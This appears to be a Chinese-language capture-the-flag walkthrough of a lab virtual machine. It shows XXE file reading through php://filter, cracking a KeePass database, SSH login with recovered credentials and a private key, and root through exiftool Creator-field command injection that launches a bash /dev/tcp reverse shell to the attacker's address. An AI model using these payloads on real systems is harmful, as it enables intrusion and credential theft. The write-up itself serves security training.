信息收集

服务探测

有个22222端口开放

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.130  08:00:27:17:c3:09       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.960 seconds (130.61 hosts/sec). 4 responded
❯ ip=192.168.60.130
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.130:22
Open 192.168.60.130:80
Open 192.168.60.130:22222
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 16:56 CST
Initiating ARP Ping Scan at 16:56
Scanning 192.168.60.130 [1 port]
Completed ARP Ping Scan at 16:56, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:56
Completed Parallel DNS resolution of 1 host. at 16:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:56
Scanning 192.168.60.130 [3 ports]
Discovered open port 22/tcp on 192.168.60.130
Discovered open port 22222/tcp on 192.168.60.130
Discovered open port 80/tcp on 192.168.60.130
Completed SYN Stealth Scan at 16:56, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.60.130
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-01-01 16:56:15 CST for 0s

PORT      STATE SERVICE    REASON
22/tcp    open  ssh        syn-ack ttl 64
80/tcp    open  http       syn-ack ttl 63
22222/tcp open  easyengine syn-ack ttl 63
MAC Address: 08:00:27:17:C3:09 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B

利用curl访问报403错误，可能是没有加User-Agent

浏览器访问就是默认的apache2的网页

我尝试输入index.php返回一个靶机名

利用fuzz模糊测试一下，或者gobuser加上-a参数

❯ ffuf -u http://$ip/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -c -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.60.130/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Header           : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 7ms]
#                       [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 10ms]
#                       [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
                        [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 10ms]
services                [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 5ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 271ms]
#                       [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1038ms]
# Copyright 2007 James Fisher [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1049ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1056ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1061ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1084ms]
#                       [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1293ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 2311ms]
# Priority-ordered case-insensitive list, where entries were found [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 2324ms]
# on at least 2 different hosts [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 2380ms]
                        [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 9ms]
server-status           [Status: 403, Size: 212, Words: 29, Lines: 11, Duration: 12ms]

交叉验证下，均可以扫到一个services的目录

❯ gobuster dir -u http://192.168.60.130 -w /usr/share/seclists/Discovery/Web-Content/common.txt  -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 212]
/.htaccess            (Status: 403) [Size: 212]
/.htpasswd            (Status: 403) [Size: 212]
/index.html           (Status: 200) [Size: 10701]
/index.php            (Status: 200) [Size: 14]
/server-status        (Status: 403) [Size: 212]
/services             (Status: 301) [Size: 319] [--> http://192.168.60.130/services/]
Progress: 4734 / 4735 (99.98%)
===============================================================
Finished

XXE漏洞攻击

发现一个入口

利用burpsuite抓一下包

可以尝试XXE外部实体漏洞攻击

XXE - XEE - XML External Entity | HackTricks

利用 XML 外部实体注入（XXE）漏洞 — Explotación de la Vulnerabilidad de Inyección XML External Entity (XXE)

我们可以定义一个新的ENTITY名为ext 后面紧接文件路径

测试一下声明是否有效

在下方随便哪个未知将111替换为ext不过要在前后加上&和;方可执行上方声明的

在这里可以发现pepita这个用户

其实XXE就类似于SSRF伪造服务端攻击，可以进行文件读取

我们尝试读取/services/procesar_envio.php这个文件，就是我们提交时网页源代码

貌似并不能读取文件，我不确定文件是不是在apache默认文件夹下的/var/www/html中

不过你可以通过php文件流读取转成base64编码后输出php://filter/convert.base64-encode/resource=

XXE - XEE - XML External Entity | HackTricks

拿到源码了，发现有段注释，让我们找到kdb文件

<?php
libxml_disable_entity_loader (false);

if ($_SERVER["REQUEST_METHOD"] == "POST" && strpos($_SERVER["CONTENT_TYPE"], "application/xml") !== false) {
    // Get the raw POST data
    $rawData = file_get_contents("php://input");

    // Load the XML
    $dom = new DOMDocument();
    $dom->substituteEntities = true;
    $dom->loadXML($rawData);

    $xml = simplexml_import_dom($dom);

    // Extract data from XML
    $nombre = $xml->nombre;
    $direccion = htmlspecialchars($xml->direccion);
    $poblacion = htmlspecialchars($xml->poblacion);
    $cp = htmlspecialchars($xml->cp);

    /*

Encuentra el fichero passwords.kdb Â¿EstarÃ¡ en esta mÃ¡quina o en otra?
找到密码文件 passwords.kdb。它在这台机器上还是另一台机器上？
    */

    // Display the data
    echo "<h1>Datos</h1>";
    echo "Nombre: " . $nombre . "<br>";
    echo "DirecciÃ³n: " . $direccion . "<br>";
    echo "PoblaciÃ³n: " . $poblacion . "<br>";
    echo "CÃ³digo postal: " . $cp . "<br>";
} else {
    echo "Invalid request.";
}
?>

读取kdb文件

我们读取hosts的发现有个域名为ftp.emerreuvedoble.thl指向了本地ip

显而易见kdb文件大概率藏在ftp中

成功拿到文件，base64解码保存为passwords.kdb

❯ echo -n "A9mimmX7S7UCAAAAAgADABrx6ktrOWV8H/WRVye6E1gyAM5XWqLZ+t+MWnp+0bfKAwAAAAEAAADh/aF7fpPZm8C8m8Fxq9qRBRG8BunbeZ32ftUendyD1UPpxZvvxb9di+9nYAmupZ7SSaZcOH2vYbn87GtybWfjUMMAAAGlIHwx+Mzl+Avyru0+0hzA9jwbgdH+WcCyfDpkyxgEDdh0c+FNuFnCSQjpqx3ELGgwY0AgGo3Pw8txn7hft2lqYKuKdUvpQoRwOui3m2awvErT8OMNxu5qh4M3EmAGpK0+ICXo5wmQ/SuiAL1Y9rpcHniF++i4hwHp7fmIydg0o24UxKmGvnamShx51MAGkg+xhlmE7wjRH7yO+EvswVqlc6S+x7ciCP/dFIXa3Kh/YkS1/e4KFZ3zkU2t97K8QLI0JP2XClswZW1c1mamHjtthS50Hyk2KeXtW1xj3xiSbXzCxPJPOeAvQY5mf8HCMiJY8ecfA4JIWoqeKnk/upwE/j6fzzl4LEbFGWopBdySF3+JGQ0/17j0DaFwJjIhY6OvPwyY1AaSs8NahoP0pzpdEVr/M55+MHNmOT7uIUqc1bvtytoGedZzuEbv5bLakswiCr1G4irOUwkMENrItms0ydA0v07B9nXLMXP43foSQGar8hSMAnfFLFabwseK+b3qyDDl1g29TauaFQf8UK+Z9YPHQml7ltmlnEiRAavXtBMZbG9ob1Idxo+bn43+vRHKvmR7O1OGyMsHDRoR7SQmmyGDfOCHXKKqu5rtvHWL" |base64 -d > passwords.kdb
❯ file passwords.kdb
passwords.kdb: Keepass password database 1.x KDB, 3 groups, 1 entries, AES, 50000 key transformation rounds
❯ keepass2john passwords.kdb >hash
Inlining passwords.kdb
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 50000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
diamonds         (passwords.kdb)
1g 0:00:00:36 DONE 2/3 (2025-01-01 17:48) 0.02712g/s 395.5p/s 395.5c/s 395.5C/s marisol..sweetness
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

拿到文件密码为diamonds ，安装一下Keepass Cli打开看一下，在线网站打开不了这个kdb文件只能开kdbx

❯ sudo apt install kpcli
❯ kpcli --kdb=passwords.kdb
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
eMail/
Internet/
ssh/
kpcli:/> cd ssh/
kpcli:/ssh> ls
=== Entries ===
0. pepita
kpcli:/ssh> show
Too few args!  1 minimum.
kpcli:/ssh> show 0

Title: pepita
Uname: pepita
 Pass: TJHrv83UK5XQE8toD7z1H9Nq1bpx3sIV
  URL:
Notes:

kpcli:/ssh> show 0 -f

Title: pepita
Uname: pepita
 Pass: TJHrv83UK5XQE8toD7z1H9Nq1bpx3sIV
  URL:
Notes:

kpcli:/ssh>

用户提权

拿到ssh登录密码了

利用这个用户名尝试登入一下

❯ ssh pepita@$ip
The authenticity of host '192.168.60.130 (192.168.60.130)' can't be established.
ED25519 key fingerprint is SHA256:S2Cb2FJzFJLPylkuLvuUpLMFRlU90ueDhkP29MMUc9E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.130' (ED25519) to the list of known hosts.
pepita@192.168.60.130's password:
Permission denied, please try again.
pepita@192.168.60.130's password:
Permission denied, please try again.
pepita@192.168.60.130's password:
pepita@192.168.60.130: Permission denied (publickey,password)

登入无果，之前扫到还有22222端口

尝试登录，结果就上去了

❯ ssh pepita@$ip -p 22222
The authenticity of host '[192.168.60.130]:22222 ([192.168.60.130]:22222)' can't be established.
ED25519 key fingerprint is SHA256:4CaLBf9SkyV2C5afTDyMrvnvRSK2YOJfrDG6WNyzUWE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.130]:22222' (ED25519) to the list of known hosts.
pepita@192.168.60.130's password:
Linux webserver 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
pepita@webserver:~$ cat user.txt
21e76d8009cfd72c652698284370d4c1

信息收集

我搜寻发现在host文件夹下有个用户juanita家目录

里面存有ssh私钥

pepita@webserver:/host/juanita$ ls -al
total 28
drwx------ 4 pepita pepita 4096 May 23  2024 .
drwxr-xr-x 3 root   root   4096 May 23  2024 ..
lrwxrwxrwx 1 root   root      9 May 23  2024 .bash_history -> /dev/null
-rw-r--r-- 1 pepita pepita  220 May 23  2024 .bash_logout
-rw-r--r-- 1 pepita pepita 3526 May 23  2024 .bashrc
-rw-r--r-- 1 pepita pepita  807 May 23  2024 .profile
drwx------ 2 pepita pepita 4096 May 24  2024 .ssh
drwxr-xr-x 4 root   root   4096 May 23  2024 docker
pepita@webserver:/host/juanita$ cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Root提权

ssh再次连接，在内部连接127.0.0.1连不上，必须退出来

❯ vim id_rsa
❯ chmod 600 id_rsa
❯ ssh juanita@192.168.60.130 -i id_rsa
Linux emerreuvedoble 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

███╗   ███╗██████╗ ██╗   ██╗██╗   ██╗
████╗ ████║██╔══██╗██║   ██║██║   ██║
██╔████╔██║██████╔╝██║   ██║██║   ██║
██║╚██╔╝██║██╔══██╗╚██╗ ██╔╝╚██╗ ██╔╝
██║ ╚═╝ ██║██║  ██║ ╚████╔╝  ╚████╔╝
╚═╝     ╚═╝╚═╝  ╚═╝  ╚═══╝    ╚═══╝


Last login: Fri May 24 10:37:44 2024 from 192.168.1.183
juanita@emerreuvedoble:~$

搜寻无果后尝试上传了pspy64监测一下进程

靶机上没有wget只有curl那也无妨

juanita@emerreuvedoble:~$  curl 192.168.60.100/pspy64 -o /tmp/pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3032k  100 3032k    0     0  48.9M      0 --:--:-- --:--:-- --:--:-- 49.3M
juanita@emerreuvedoble:~$ cd /tmp/
juanita@emerreuvedoble:/tmp$ chmod +x pspy64

发现UID为0的用户会定期执行/opt/remove_temp.sh这个文件

juanita@emerreuvedoble:/tmp$ cat /opt/remove_temp.sh
#! /bin/bash
cache_directory="/tmp"
for file in "$cache_directory"/*; do

    if [[ -f "$file" ]]; then

        creator=$(/usr/bin/exiftool -s -s -s -Creator "$file" 2>/dev/null | cut -d " " -f1)

        if [[ "$creator" -eq "juanita" ]]; then
            echo "Removing $file"
            rm "$file"
        fi

    fi

done

定期清理tmp目录下的文件

creator=$(/usr/bin/exiftool -s -s -s -Creator "$file" 2>/dev/null | cut -d " " -f1)
这一行使用 exiftool 工具来提取文件的 “Creator” 元数据字段（通常是文件的创建者）。

-s -s -s 用来简化 exiftool 输出，只保留关键信息。

-Creator 指定获取 “Creator” 字段。

2>/dev/null 会将错误输出重定向到 /dev/null，即忽略错误信息。

cut -d " " -f1 会将输出按空格分割，并取第一部分，即创作者的名字。

if [[ "$creator" -eq "juanita" ]]; then
如果提取到的 creator 变量的值是 “juanita”，则进入此条件语句。

注意：-eq 是用于数字比较的运算符，但在此脚本中，它是用于比较字符串。正确的字符串比较应该使用 ==，例如：if [[ "$creator" == "juanita" ]]; then。

echo "Removing $file"
如果文件的创建者是 “juanita”，脚本将输出一个消息，说明它正在删除该文件。

命令注入

突破口就在creator可以设置为执行脚本

我们写一个反弹shell脚本到rev.sh

然后bash中引用即可

这里的$( )也可以用反引号数字1左边的那个``

注意不要用~/rev.sh虽然这也表示文件路径，但文件是以root身份运行的所以要指定绝对路径

juanita@emerreuvedoble:~$ vim rev.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.60.100/1234 0>&1
juanita@emerreuvedoble:/tmp$ touch 111
juanita@emerreuvedoble:/tmp$ exiftool 111
ExifTool Version Number         : 12.57
File Name                       : 111
Directory                       : .
File Size                       : 0 bytes
File Modification Date/Time     : 2025:01:01 13:01:04+01:00
File Access Date/Time           : 2025:01:01 13:01:04+01:00
File Inode Change Date/Time     : 2025:01:01 13:01:04+01:00
File Permissions                : -rw-r--r--
Error                           : File is empty
juanita@emerreuvedoble:/tmp$ exiftool -Creator='$(/home/juanita/rev.sh>&2)' 111
    1 image files updated
juanita@emerreuvedoble:/tmp$ exiftool 111
ExifTool Version Number         : 12.57
File Name                       : 111
Directory                       : .
File Size                       : 2.9 kB
File Modification Date/Time     : 2025:01:01 13:01:57+01:00
File Access Date/Time           : 2025:01:01 13:01:57+01:00
File Inode Change Date/Time     : 2025:01:01 13:01:57+01:00
File Permissions                : -rw-r--r--
File Type                       : EXV
File Type Extension             : exv
MIME Type                       : image/x-exv
XMP Toolkit                     : Image::ExifTool 12.57
Creator                         : $(/home/juanita/rev.sh>&2)

新开一个tmux窗口监听端口1234

❯ pwncat -l 1234
id
bash: no se puede establecer el grupo de proceso de terminal (3267): Función ioctl no apropiada para el dispositivo
bash: no hay control de trabajos en este shell
root@emerreuvedoble:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@emerreuvedoble:~# ls
reset.sh
root.txt
root@emerreuvedoble:~# cat root.txt
3c3fbc0c2472571d8e652afd876686ad